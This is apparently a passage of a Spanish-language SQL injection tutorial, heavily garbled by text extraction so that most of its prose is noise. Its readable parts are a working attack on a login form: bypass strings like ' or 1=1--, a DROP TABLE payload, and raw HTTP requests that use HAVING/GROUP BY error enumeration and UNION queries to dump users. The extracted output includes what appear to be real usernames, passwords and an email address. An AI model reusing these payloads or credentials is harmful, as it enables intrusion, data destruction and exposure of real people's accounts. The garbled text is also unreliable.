!

!
#$%&

"
'
" * +"

(
,# .
/
"0#$%
'
"
, *
) 1 % )" + !
"
, *
, ")
- **
2 #$% '
"- " "
3 #$% 4
)

?
@
B
C

) 5
,
! )
%"
"
5 "
67"
* 8*
"
. 5 9 ", #
:)
*
*
#.
8<
+
"
" )
>; ) 5
4 '
" ;
4 #
!
4 ! ', *
#$% 4
: "'
"
' "
"A
"
*
"+%
"'
; "
A " "' ) "
5.
"

""

) " " "
! 6 . "
#$% 4
+ ;7

"

.

/
;
" =

"
"
" .>
", "
"
" 8<
" "

#

,

"

!

,

"

"

"

"
"

#

8

"

)4
" 7

# )

"

"

+ =
)
& " +

. "
!
.
7

6

&
"
"+

"

9
&
"

" "
. "
( "

&

D
"

9 &

"

"

(

*
6

+

*

"

6
.
"
" 6 ( ""
" 4 ""
"
7<
"
) "

"

" "

"

&"
"
"& "=
. (( #

+

2
;

" "
"

*
5
"

.
"

6 " .

"

"

" 6
"

)

&

"
(

"

")

)

* 9

"

7 " 6 (&
. 4 #$%&
" "
" "

" *

"

9

"

"

$

!% & '
5 *
"
D
C 2
.
6 " .
'
"
* 9
"
" 9 ( " ) 4
&
"
* )
4 "
"
%
#8$ 8%
*
*
&
!

% .
. =
4 " " "
"
+&

"& +

"

D "

"

"
&
.

"

)
" "

*

(
&
"

"

"
)4
"

) 4 )
6
9
"

( )
"

+
8 . "
6 7 "
6 " . "&

*

9

"
&

"

>#

"
"
) "
"
9
. 4 #$% " 6
E#+) " & :
+
"
51#
CB@ +
"

9
"

.& 9
+" " ")

"

*

"

)

"
. 4
"& 9

"
") " "
.

"

4
"
. 4
+ % . . >
*
6
D
C &
#8$ 8%
#$% E#
$ + % . . F

$

" D "
,-

&

9
9

+ =
*

<F
#: * "
" 6"
.=
.
"
. 4
4
"
6 "
. 4 "
"
"

*
CB
" #$%BC + #$%C &
"
6
"

"
"
6

.
"
"

"

"
"

+

(

"
&

"
"
)
6 "

"

>!
#$%>
"
9
4 "
) )
"
6
"
" . "
4 " "=
9
"
#$%2
.
6
"& 9
"
+
6 6 "
6
. 4

(
) * # +,
$ ( " " "
"
" ) "
"
" 9
- +
" *&
) 4 ) 4
"
"
9 " =
" "
=
,:# !
9
"&
9
" *
"
& " )
) 4
9 "
6 "
2
G
" E,
.
*
&
" 6 "
"
"
"
""
F&
" *
) "
D= " " )
" ) :# & " "
" )
"
)
"
.
" 6
"
!'
"
"
%51

3
5

) &
( ) "

"C &
9 "
& )
9
. )
"
6"
9
4
& "
9
" )
*
" . =
"
6 6 "
# &
)
" 6 "
2F
" 9
" *
9
"
)
:# 2
%

"
)
7

" 9
" ") "

) "
"
9

"

8
""

:#
"
6 &

6
'

"
9

&

- "
*

"
"

*

"

, "
"
6 "6 "
"
#$% @

&
"
"

.
"

"

"
"

"
.
"

" "&
"
"&

"-

.#

'
*

"

/

" .

) =
.

!

0

9
6 "& +

9 6
"

"
"

" .
)

*

=

9

"

6

6

"

#+) "
:#

+

G

+
9

"
" 1;& +
" *
0 "
"

" * #$%& " *
9 ( " .
CC?
"
"9
.
)
"

#0#$%& ) 4
&
"
"

F&

"

"

"
6 "
#$%
.

&

"
" *

,

)
-

6 "
)
" 1;> H "
D CC2

"
&"
"
G

&

#+) "

5

)=

" "

"

.

E#$%

6 "

"

9

.
"
"

)

) "

" 1;

67"

"

CCB
.
)
9
9 " )
" - "
9 "
. "
" .
" "

9

D CC
=
" * #$% # 6 3 *
( "
"

) >
( =

& +
9
=

( )
.
"9

"

.
6
, "
G

&

"

" *

=

"

"

,

"

:#

" )

7"
"
"
&"
*
*
"9
" *&
2
G
" 1;

" .
"
9
"
"
E!
9
) 4 =

"

" * #$% " 6 "
&
"
I)
&
"
" )
.
( #$% # 6
&
"6
)
"
"
&
"
" "
"
6 4 ""
&
9
"
"
"
"
4
6
" "
=" "

*
9
9
#$% # 6

& "
" "
"

"
""
<

" *&
*
"
"& "
" "
"
.

+
) "

"

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

E8" " 6 6 " " " . " >5 9 " 9 * 6 & " "9 " #$% ) "& " . .G881 % R8 1 + . " ' * " . " 9 ") "5 # # 67 " H ) ") " 9 = " & . 8 & >& " " " 9 "& " ." . ) >F UPADTE Tabla SET password = 'Juajuajua' WHERE user = 'admin' E8" " ( = "" " & 6 F 5 4 " ) & " " " "& " " " 9 . * " ) & " & 7 9 " + 4 " * * "* & " " 6 " 9 + ." " ) >. ( . 4 #$%& " 4 " " ! 4 4 " # ) " & " 6 " & 9 6 " " #$% " " = & " " " " " "" " 4 " " " + #$% & .B 3 % & T U TU TV UV V -8." " ) " " 4 & ! SELECT * FROM Tabla. * " 9 9 9 9 6 6 " ( ( " * . 9 + ( .

# 0 :) * 0 8< + 0' " . & " ) . * " * " " "6 " " " ") " " " " 6 " 9 . " " 0 8* " 05 9 ". " * " " " ! . )4 6 " 4 > " "9 & ) " " .= " " " " " ) " "G " " " 5#! =" " 9 &* " < " " " 6 " < " * "& " ". * " " =* * # 6 " ) " " " #0 G " 9 * " " ( " 7< " " " . " " " 8 " " = " * . . 4 . 9 * + 9 . " )4 6 " &+ " " " ) 4 * * ( 6! # ) ) " 6 & " " 9 8" " 4 #$%& 5 + 4 >#$% #0#$%& " * " " "". J # 9 " " ! " "& & " 6" < ) 9 " 5 * " " 6 + 6 9 ) 7< ". J " " & 9 < ( * 4 " 8" " " " " 9 + &) 4 " 7 " . " "* " ) " " "9 6 " + "" ) " " " " 6 " ) " 4! $ (! & 9 " " 6 . 4 " " . & " " " & " # ! 6 .C " 6 " " ) " " = # ) & )4 < 6 " " ) " .J . " #$% 6 " " " 7 . * " 6 "9 9 . " &.

& " & . ) " <FORM action=logon/logon.J 6 " " " * 9 " " " " & " "& " ) " )9 " " )& " 6 "& + " ) . . 5#! ) " " E! * . %& 9 ) " "& . . < " . ) + = 6 6 " ) ) 4 " ( " 6" ) " " . 9 + " J . &) " " 6 " " 5#! " " F 8 + 6 " " " & ( " . " " ) ) M. " " " " . " "II ) & " 4 ( " & " "= + " " " . " " . . " " . % + 6 6 & * & ) " . " " " * .asp method=post> <input type=hidden username=_UserName password=_Password> </FORM> 8" * .8 9 + 6 "9 ( " 8" 9 " = " " & "9 " " ) " 9 " ) 6" " " ) " & " " * " D + :M& " " " " " "+ 8 " " " " ) &" " 6 " "& ) " ) 6 ( & " = " "" " = " " 6 )& " ) " " 6 " " " 9 " " : % * " ) " & + = ) " " " . &" . " " * 6 + . "= < * ) ) select * from users where username = _UserName and password = _Password 5 * " ) 9 " " " 6 " 6 6 " " " " . " * " * * 6 " " " 6 "" " " " " "& )7 .

5#! 9 8 " " & + ) ) . . "* " " " % 9 " = + ) " " " " . 9 * 6 " 6 . H " " = .+ ) ) " " < " % " ) " * " " http://www.= EN. " ) 7 " " + " + " 9 + 9 ) " #$% 5 6 " & E' " " " F # ) " " " ! " % L E' # " 4 &" + 9 " ) * + F " "& " " "" " " ) 4 " " ) L " ") + " * #$% # 6 " " * * 6 9 9 " 9 6 "" " ) #$% 9 * " ( "9 4 ( " 4 & ( " .asp?edicion='Noviembre' ! " " & " " " " ) + ) " " L1 6 ) L " " " " ) 4 . " .com/libreria.F )7 " " 6 . ) " " " . " select * from numeros_anteriores where edicion = 'Noviembre' " #$% > " & " 6 9 = >& .objetivo. & " " " "* " " " " * . & " ) " " " + " " 9 . " " " " + & " " " " ) " Usuario : An'gel Password : 338xD select * from users where username = 'An'gel' and password = '338xD' .

select * from numeros_anteriores where edicion = 'N'oviembre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username = 'An' edicion = 'N' % . & " 6 9 " " " + ) 4 " " " . " . "9 . " 4 " 9 9 " #$% # 6 ( & & ". "6" ) " "+ " " * " " ( 9 + * 9 6 " " . " . " " 9 " #$% # 6 & " 9 .

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

" " " 4 " " 6 + = ) * ) & 3( " & # " : 0% & " " "+ " .= & ! . " 4 " " " " " "" " " ) "& 9 " "& " . " " + * "& " " ) 6 " " " " * " . " " " D " 9 6" + ) " < " "+* " " " " & 9 4 4 4 ) " . " # 5 : + !5##G: . "& " " . 9 .J " " " "6" + " 9 * " . ) 7 = " 9 * " " 6 #$% " <"" . 5#! 9 ) " + 6 #$% . #$% "" " . Helvetica.= "" $ ! .Extracto ------------------------------------------<FORM action=ingreso.asp method=post> <TABLE cellSpacing=1 cellPadding=3 width=440 bgColor=#ffffff border=0> <TBODY> <TR bgColor=#ff0066> <TD><B><FONT face="Arial. *= ---. " " " " " . < = " ) . *= " " = " " "& : 0% . " " . % 5#!& * " " " " 9 6 "9 " " " 6 "& . " " 6" * . ! 6 " " . 5 " " " " & ) ) * "& ) . sans-serif" . I) & E> L >F * " ) 6 " + " = (! " .3 $ (! 6) " " " " " " / ! "+ " " " * " 6" " H 7 " " ! " * = " . 86 . * " " " ) & " 4 8" " * .

sans-serif" size=2>Clave</FONT></B></TD></TR> <TR bgColor=#ffcccc> <TD><INPUT name=USERNAME> </TD> <TD><INPUT type=password value="" name=PASSWORD> </TD></TR> <TR align=middle bgColor=#ff0066> <TD colSpan=2><INPUT type=submit value=INGRESAR! name=SUBMIT> </TD></TR></TBODY></TABLE><BR><BR></FORM></TD> <TD vAlign=top align=left width=10> </TD> <TD vAlign=top align=left width=140> <TABLE cellSpacing=0 cellPadding=0 width=140 border=0> <TBODY> ---. ) select * from users where username = ' or 1=1-. ( " = " & ) 4 & " F .and password = ' or 1=1-- + . " " & " " " " " " 9 * + 9 " #$% " 6 "6" "& + " " "& " ) " select * from users where username = 'Angel' and password = '338xD' ! " " 9 ) " ( " "9 " + ( "" . Helvetica.? size=2>Nombre</FONT></B></TD> <TD><B><FONT face="Arial. 4 * 5#! E! "9 5 ) &" 9 6 " " " " ) . " ( .Extracto ------------------------------------------! " 9 . " " I :M& " + 'or 1=1— " 6 " . % . " Usuario : 'or 1=1-! "" L V W A 47 " "& . " ) * <" 6 9 = 6 ) ) " 9 * " + " ) * 4 = " " #$% " " " D . 9 = " .

@ 1 9 " "" . " " & F& . " >5 > 9 > <" > " = Usuario : Admin'-Password : 'or 1=1-8 = & " 9 " " = " " " . " 6" " " "& " " " * " / " .J " & " ) " 6 " & 6 4 . "" + " 6 . " & "6" " 9 4 ) 6 F " " + & ) ) + " " ">L> " + > 00 > E. 8 E' 6 " * "= + " . ) / F " < "& " ) " " . " & " " & " 6 + > 00 > E. " " 6 & . 9 . 9 " 1 ( " 6 6 + = <" " " " " " 6 " "6 E "" " " >: > 9 " " ) . F " " " 9 6 . ) & #$% 9 . + & ( #. 0 4 Usuario : 'OR''=' Password : 'OR''=' 5 4/ ' ) " > " # ) " & " ">& " #$% "& . + " < " ( 7 " . select * from users where username = 'Admin'-.and password = ' or 1=1-# . " 4 )4 .

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

" 9 & & " " "E ) "6 & + " . .-' :%8 . 6 9# + & % " 9 " . " 9 * " " 9 " 6 " " 5"= + 6 " ( & . ) = " & + 1 $ % + 67 ) : 3( ! ) ) 7 " ) & #$% ( 4 " D # ) " " " " .B . " ) " " ) " . " "6" " . 6 9 J " " " ) & " " = 4 & F & * " 9 * & & Usuario : '.J 4 " & . " " 6 * " & " = 8 " . # " " ) "& " " " " & " 6 & " "9 ) . " " 6 .4 " #$% # 6 . # 6 & " 6" " " " " E8 " " ) " = "& 4 " ( + ( & F 5 9 * 6 9 " " " 6 " &6 9 4 " " ) " "9 . " "9 "& " ) . & + M #$%& " " &" " " D " " E' = " 5 9 " 9 " .J & 9 7 " > " &" " " "> " ! 6 & " * + ) ( . % & 4/ . 7< " " & ( = & 9 " " * F . drop table usuarios-Password : # * EH " ) ) ) & ' 6 " * >8* . " >F & " . $ ! #& " * " " " " ( & " " ") " 9 ) " :.

C "9 1 " " "6 ) " 8 & " " "9 ) " ! " " " " D 6 6") " .<< 9 + .-' 8 " )Q .8#* ."3. 1 "9 * " < " * #$% < ) " " " > )Q ) >F " * )Q ) & ) ) " " ( " " " "> . > * ) 3 % ) 010.9$ (")-#) 123 :. " &" " &+ " 4 " " " + " 6 (" "& +* " * . - & 6 :)6 % " E 2 ! 3 8 ? .1) 8 6 + "9 * " " " 6 ( ".login='\'') ODBC Error: 1 (General Error (The ODBC interface cannot return detailed error messages). > & " " :. Warning: SQL error: [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string '\')'.. SQL state 37000 in SQLExecDirect in php/db_odbc. " " 9 6" " "> " .inc on line 61 Database error: Invalid SQL: Select * from usuario where (usuario.) Session halted.-' " " 9 " 6 + :. > L > E' * " " 4 # 9 " 6 " " < " " " & " " F " & 6 " " ) " " .

0. 6 " " " " " " " = #$%& 6 " " 6 " ) " " " ! 9 + #$% ) " ) 9 " " 4 ) " ) " " . = 0.v 1. 9 & " "& 9 * 9 9 6 " " + 6 & " " . " 6 4 * .Fragmento ----------------------------------------6 " " . $Link_ID $Query_ID $Record $Row var $Errno var $Error = = = = 0.Fragmento ----------------------------------------<?php /* * Session Management for PHP3 * * Copyright (c) 1998-2000 XXXXXXXXXXXXXXX (XXXXXX@XXXXX.----. 0. " " .XXX) * * $Id: db_odbc.XXX) * Modified by XXXXXXXXXXXXXXXXXXXX (XXXXXX@XXXXX.inc. $Database = "". $User = "".3 2000/07/12 18:22:34 kk Exp $ */ class var var var var var var var var var DB_Sql { $Host = "". $Password = "". & " 9 4 . ----. = "". &" * * A * " )Q ) " " " >" " > " 6 ) " X " + X! "" " 9 " ( " " " . " * " + 6 + . " " < 9 " " ) E8 " " F : ) & * / :M& 6 " " * 6 " "& * + " " " + . $UseODBCCursor = 0. " "6 & . array().

asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip.asp?validar=2 HTTP/1. " . image/pjpeg. MSIE 6..8 " " " ( 6 " 7 " #$% " 4 " & " ( & " " ! " 9 6 4 6 " " ) " ) " " # "6 " "& " " & J * " " ) < 9 " " " ( 6 +) " " " 9 " " B " * " . deflate User-Agent: Mozilla/4.! * E8 " " * # +1 & " .com/Login.objetivo. " >! "" > .0.1 Accept: image/gif. . * "' "+% ) 4 F 9 7 " < "" " " " " 6 % E8 "' ". " 9 " . " " E5 .xxxxxxxxxx.com Content-Length: 34 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA.! " )4 6 & " 6 " < & & ".0 (compatible. Windows NT 5. = 6 " "& " 6 & " * " ( " 6 nc -vv www. " ) )4 6 . image/jpeg..0) Host: www. " D " * " " .com 80 < sentencias. */* Referer: http://www..txt ' ' " & ( 8 9 ) " " 8" * + + " * " ** * F& .! M "F& E5 . image/x-xbitmap. 7 " 9 D " < & " " 9 " 6 " " " . ) " " " F& " 6 " " POST /Login. application/x-shockwave-flash. xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=Angel&txtPassword=Angel Y Y Y H .xxxxxxxxxx.

" . " . " ** ) " 9 ) * " 4 !:#. " Y H + L 6 .asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip. MSIE 6.0.asp?validar=2 HTTP/1.-F ) " " " 6 " " " " > " )4 H 6 ( " " > " . .1 Accept: image/gif. 9 > " " " < " 6 6 " )" 6 6 ( " )+& ) " #$% 9 F " ' " " " * " 9 < & " 4 "& " 4 " * 6 " " " " 6= " " " * ( 6 POST /Login.Y Y H * - & " ! " " " * ( * 8 " . V 00 E8 Z 6 .[ Z2. xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=%27having+1%3D1--&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * Y .0 (compatible. Windows NT 5.com Content-Length: 46 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA.0) Host: www.xxxxxxxxxx. 00F " . deflate User-Agent: Mozilla/4. image/jpeg.xxxxxxxxxx. ) <& 4 " " .application/x-shockwave-flash.& . */* Referer: http://www. image/pjpeg. + ) " ) > L > E' 9 " ( 6 " " F & * " 6 " ) " " " E 6 . " 9 "" < 6 " " " + & 6 6 " ) " ! " " " * 9 " 7 ) 4 !:#. image/x-xbitmap. 6 "" ( > " > "> #$%& " * 6 9 #$% E 4 :%8 .com/Login.

com 80 < Injection. Z ' Z B Z C Z28 Z2' " .& " + ' # ! +' .M# " " 9 " " 8 * " " " 4 = " !:#.objetivo.2 1 .html - 6 "9 ) ! " " " * " H " 9 6" " " 9 9 4 " * & " "" " . "! " 8" #. . " " * " 4 " > 6 .! " Z Z2Z25 [ Z Z2. " " "> > " " " " 6 ! \ ] 5 ! [ 0 ^ Q 9 6= " 6 " " ( " & +6 ( 9 " 9 " ) " Z 0 Z?' Q 4 <& " " 9 " " ! 6" 9 " .. $ 3 " = )*1( 5*'> ! " " ) " ) " " % ) 9 6 6" "".txt > result.>& " & " " 7 ) . ' ! 7 "" ! 7 "" + OO V & E F U T :MK 6 "" " " " ( 6 6= " &+ 6 " " " ) "9 " nc -vv www. " " + " " + " 9 .

com Content-Length: 71 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA. 4 " " )" 6 9 #$% # 6 " 6 6 * " " . /Login. image/x-xbitmap.asp. deflate User-Agent: Mozilla/4.1 Accept: image/gif.0) Host: www. line 85 ! * KK " " " 4 " ) ) " E # 5 :#F& "= " 5 " " H 9 6 6 " "& " 6 " )7 " 9 & & " = :. application/x-shockwave-flash.xxxxxxxxxx.-' ( ) * ) & " * < + ( " " " " " 6 !:#.UID' is invalid in the select . V 00 % . " 4 6 " = &6 " ". image/jpeg.F * " " ) .com/Login.UserID+having+1%3D1-&txtPassword=Angel Y Y H 9 6 " Y >! "" > * Y . )+ " " " . 6 .asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip.asp?validar=2 HTTP/1.0.xxxxxxxxxx.UserID' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. " E " .0 (compatible. " H + L.xxxxxxxxxxx =COUNTRYNAME=Argentina txtUsuario=%27group+by+usuarios. Windows NT 5. image/pjpeg. */* Referer: http://www. MSIE 6. Microsoft OLE DB Provider for ODBC Drivers error '80040e14'[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'USUARIOS.3 Microsoft OLE DB Provider for ODBC Drivers error '80040e14'[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'USUARIOS. = & * " # 5 :# ) POST /Login.

? list because it is not contained in an aggregate function and there is no GROUP BY clause. " ) * " " ( "+ " * 'group by usuarios.Nombre' is invalid in the select list because it is not contained in an aggregate function or the GROUP BY clause.UID.= & " " " 9 " ) " >. " )+> " " # 5 :# " "& " + 8" " = " > 6 . /Login. ) " " > .UID having 1=1-#! ! * Microsoft OLE DB Provider for ODBC Drivers error '80040e14'[Microsoft][ODBC SQL Server Driver][SQL Server]Column USUARIOS. " > > 6 > " & " 9 " # 5 :#& .asp. line 85 . line 85 6 ( " " 6 ( + " " #.usuarios.UserID. /Login. .asp.UserID.usuarios.usuarios.asp.Nombre having 1=1— #! ! * Microsoft OLE DB Provider for ODBC Drivers error '80040e14'[Microsoft][ODBC SQL Server Driver][SQL Server]Column USUARIOS.> " ) . /Login.Email' is invalid in the select list because it is not contained in an aggregate function or the GROUP BY clause. line 85 * 'group by usuarios.

:# " " #8%8'.& " " 9 " " " " .@ * 'group by usuarios. * " )+ & " " & .0 Date: Fri.campo2.& " & " " " " + " " " " ( ' " ..Nombre. > " "8 > 8 9 " 9 & ) " .1 100 Continue Server: Microsoft-IIS/4. 14 Feb 2003 20:02:22 GMT HTTP/1.Email having 1=1-#! ! * HTTP/1.! 1: " &" 9 " " " 6 . 16-Mar-2003 05:00:00 GMT. " + 9 * " II 6 " 4 < " # " " . .UID. :M " 9 =& " )" 6 " + ) ".:. E/ "1 F A=4 " 9 " " !:#. " 9 .usuarios. . usuarios. . * ) " .path=/ Cache-control: private Object Moved This object may be found here. ) 9 9 " " 9 " * . V 00F .campo3 FROM nom_tbl WHERE campo1=x AND campo5=y . expires=Sun. " " " " ) " "& 4 6 9 #$% 6 + E8" " L. " " "1 ) & " * "8 " ) & " " "" .14 Feb 2003 20:02:23 GMT Connection: close Location: PaginaPersonal.asp Content-Length: 139 Content-Type: text/html Set-Cookie: xxxxxxxxxx=USEREMAIL=rcesar6%40hotmail%2Ecom&CHATNAME=&US ERFIRSTNAME=roxana&COUNTRYNAME=Argentina. " > > " ( " #8%8'.1 302 Object moved Server: Microsoft-IIS/4. & " "& " " #8%8'.0 Date: Fri.usuarios. 6 .UserID. SELECT campo1.

0) Host: www.name+in+%28select+top+01+b. * " >#8%8'.> * 9 " ) " 6 ( " .1 Accept: image/gif.xxxxxxxxxx.xxxxxxxxxx. " " ) " > >. image/pjpeg. " 1 :1 " . )+> + > 6 .0. & " " + % .na me%3D%27usuarios%27+order+by+1+desc%29+order+by+1-&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * . */* Referer: http://www. " Y Y H + "L " ) & & & * "+" )4 " & "+" " ) V) VL " "L ) E" ) * "+" )4 " & "+" ") V) VL " "L )+ " F )+ 00 > "> 9 " " ) " " " III H "& ( " + = 9 " " # * " ( " . application/x-shockwave-flash.# + #S#':% 1# " > .com/Login.id%3Db.asp?validar=2 HTTP/1. Windows NT 5.name%3 D%27usuarios%27+and+b.name+fro m+sysobjects+a%2C+syscolumns+b+where+a.0 (compatible.( ) = " ) = .:! E8 " " F % " " " ( 1 6 9 " " 6 " #8%8'.>F " > + > 2>& " 9 " ="&" * ) " " " " " POST /Login. * "+ ) 7 " " " E8" " >& > <" > ?> E.com Content-Length: 297 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip. image/x-xbitmap.id+and+a.id+and+a. + 9 " " " & " " " " ) " "" #S#:-b8'. deflate User-Agent: Mozilla/4. 7 " "& "= * 9 ) 6 " " . xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=Ups%27+union+select+b. MSIE 6.id%3Db.name%2C1%2C1%2C1+from+sy sobjects+a%2C+syscolumns+b+where+a. _ A : ` a> " " " " 7 F " ( . image/jpeg.

1.-' " " 9 ) # 5 :# " > " # )!% #. " D * " " * " # " + " 6 ( 9 " " ) " ) + " " 9 " #$% > 1 :1>& " 6 . > % . 4 #$%& " 9 " J " * "& " ) J 6 " ) " " ! 4 & " 1 :1& " " " > " " " " " ) " " ! " EF& " ) " 7 9 " * " " J >& " ) . line 85 :M& 6 " :.id and a.:. syscolumns b where a. " " " & Ups' union select b. .colorder = 48 -7 " " " E! >F " > ! 6 " & 4 4 9 " " " " 4 " " " +J ") " 7 " . % " 9 = " " 9 .1 from sysobjects a.:# 6 !:#.:! F .id=b. )4 ) ) " " " 6 " " " . 6 ". ) ! #& & 6 "& " ) " & " " &+ " & ) " " & ># 9 )7 " " " % . ) "+ " :- . ( " 4 Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'UserSubPLUSDate' to a column of data type int.:!& " " .name='usuarios' and b. " " EF> " # ) " 1 :1 " " " " >) " "> . /Login.name.B 4 . .asp.:! + " .1.# 5 ".

) " & "& " ".xxxxxxxxxx.0.0 (compatible.com Content-Length: 82 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA. !:#.0) Host: www. . */* Referer: http://www. ) ) " " .1 Accept: image/gif.-' " " ) 9 ( " 6 " " " " " " ) & "= & + ) . deflate User-Agent: Mozilla/4. " Y H + L " " E . xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=%27+union+select+sum(UID)%2C1%2C1%2C1+from+usu arios--&txtPassword=Angel Y Y Y H 9 6 " >! "" > Y * .> 9 " " 6 E> " ( " " & " " " 6 9 6 " 4 4 " " " F 1:& " 9 = 6 :. " < 6 ". 4 " " 6 " = 6 & ) )4 1 " " Microsoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a nvarchar data type as an argument.xxxxxxxxxx. line 85 ) " " & 9 " " I8 .asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip. Windows NT 5. " .asp. /Login. application/x-shockwave-flash. " " 6 " " 6 " 4 < + 7 " + " " * 9 POST /Login. image/pjpeg.C 5 9 ( " "4 .asp?validar=2 HTTP/1.F& & & * " "00 6 ( "& . image/x-xbitmap. image/jpeg.com/Login. MSIE 6.

" . ) " &" * "& " " )4 6 " " " " #$% 1 :1& 9 " " " ( & . E1 ) " " # " !G# E' " D F " + " " " < " ! & " > > .2 " " 6 " #$% ) " #$%KK& " 8 " "& "& " " " " ) # " " ) " " ) " E! " " " " + ) " "9 ".5 * " )4 6 & b 1. " "" "& " . 4 6 " 6 & .> 8" * IIF " ! :M& 4 * * " ( " ) "& . F 9 " " 9 " . * & )" 6 1 &( ! # 5 :# 6 6 " D " " 6 . " " " ! ) ! * " " " ! * M " " " ! * " " " " ! <# " ' ( " ." .5 ) +8 > . " . " " . ) 6 " " EA 7 4 " + >5 6 6 " " 1H5 ' 5 " >9 4 > # " 6" 4 # # " " " # )!% #. - " " " 4 " F " " . & " & 9 F .5.8 .: 9 " " 9 " #$% " " (! * " 9 9 " < =" ># > & #$% " " " " 4 " 9 " < " & 6 7 " " " " " " " " " 8 " I #$% " + " " 9 1H5 ' 5 " " ) " " " ! <1 " " ! M " " %"# " " " . " " " . " " + " F " " > . " & "" . > " E! . . M " .:. " " ) "& + " " * >86 "& " "" " 4 E% " 9 9 " + . !: . #$% ! .J & " " "& " " ) " " ) " ) " " 6" " > >& 9 . &9 " < ' " 5 + ` a>& #$% & 6 " " " " 4 " 9 " " " " 4 " * > .

xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=%27+declare+@aux+varchar%288000%29+set+@aux%3D %27%27+select+@aux%3D@aux+%2B+UID%2B%27/%27%2BPWS%2B%27%3 B%27+from+usuarios+where+UID%3E@aux+select+@aux+as+aux+in to+xtmp--&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * Y .0) Host: www.2 4. "& .xxxxxxxxxx. image/pjpeg. image/jpeg. 8 .asp?validar=2 HTTP/1.xxxxxxxxxx.com/Login.= .: 9 " . . ! 6 ( " " " )4 * " 6 & #! ! .application/x-shockwave-flash. & " "9 " " A=4 " 9 * 4 . ! " ) " E% 9 " 6 " " " * "6 " 6 " " & " ( * 1. */* Referer: http://www. " " "" ( 7 " " " ! > $6 3 / % #$% " * H 6 . " Y . MSIE 6. > * ) ) . Windows NT 5. " 6" ( F * " " . !< #$%& !& (! ( " * ( . deflate User-Agent: Mozilla/4. " " " " " ) " ) 6 " * & " (! 6#. image/x-xbitmap. " >) 6 " ) " " 7 " 9 " ) " = # (! .1 Accept: image/gif.0 (compatible. + !G# F+6 " * 9 ) = + POST /Login.0." " 6 !:#.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip.com Content-Length: 199 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA.

0001/13119695.xxxxxxxxxx.0 (compatible.susy/susyk a.asp?validar=2 HTTP/1.SANDRA/4484188. MSIE 6.2 H + <V W < L [L L[ <[ -> $6 3 . ! EB " " F" <VLL " U <" < " (! 6#.-' 6 6 .0) Host: www.com/Login.CIELORIANO/daniel. xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=Ups%27union+select+aux%2C1%2C1%2C1+from+xtmp-&txtPassword=Angel Y Y H 9 6 " Y >! "" > * Y . Windows NT 5.maria_perez/12345.AngelicaS/chainy. " " Login de Usuarios Registrados Microsoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'Danyr2/pepe.ALELARRAINP/14 05. 6 ( " #8%8'.) " . image/x-xbitmap. image/pjpeg.com Content-Length: 76 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA.application/x-shockwave-flash.Mireya_Salazar/gabriela. */* Referer: http://www.AsdrubalCh/1173. deflate User-Agent: Mozilla/4. image/jpeg. " 4 * <& & & * * < 00 & " " 6 * :.1 Accept: image/gif.batv/peresosita. ! " & " ) ) " ( " < + 7 " POST /Login.MVidales/male. 8 <6 "[L]L* .asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip.0.beatrizay ala/10338154.THEMA/M1703. " Y H + ) " ( " * "L " ) " !:#.xxxxxxxxxx. .

